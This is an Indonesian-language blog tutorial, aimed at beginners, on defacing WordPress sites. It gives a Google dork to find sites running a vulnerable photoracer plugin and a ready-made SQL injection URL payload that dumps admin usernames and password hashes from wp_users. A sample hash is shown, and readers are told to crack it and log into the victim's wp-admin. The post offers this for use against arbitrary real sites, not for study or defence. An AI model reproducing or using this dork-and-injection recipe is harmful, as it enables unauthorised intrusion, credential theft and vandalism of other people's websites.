Cara Deface Dengan Exploit Wordpress For Newbie - Ya, memang tutorial ini merupakan tutorial lama tapi tidak ada salahnya kan berbagi? Ok simak saja baik-baik.
1. Ketik dork berikut ke kotak pencarian google : inurl:"wp-content/plugins/photoracer/viewimg.php?id="
2. Nantinya akan muncul beberapa web, buka salah satu untuk di eksekusi.
3. Tambahkan exploit ini di belakang url : +union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users
Contoh : www.site.com/wp-content/plugins/photoracer/viewimg.php?id=1 menjadi
www.site.com/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users
4. Nah, nanti bakalan muncul penampakan username dan password dari web tersebut.
Contoh : admin:$P$BfwsoL2ygVgJxpx3lLT9j/0IxRRgDB1
5. Disitu, bentuk password masih berupa salt/MD5. Silahkan anda crack terlebih dahulu, untuk password yang berupa MD5 bisa di crack disini
6. Jika sudah dapat username dan passwordnya, anda login ke web tersebut melalui www.site.com/wp-admin/
Selamat mencoba ^_^!
0 comments:
Posting Komentar
Hargai penulis dengan memberikan komentar yang baik dan mengklik iklan yang ada
Rules komentar :
1. No SPAM
2. No live link (link aktif)
3. Jika bertanya gunakan akun yang terdaftar
4. Komentar yang tidak pantas akan dihapus oleh admin
Click to see the code!
To insert emoticon you must added at least one space before the code.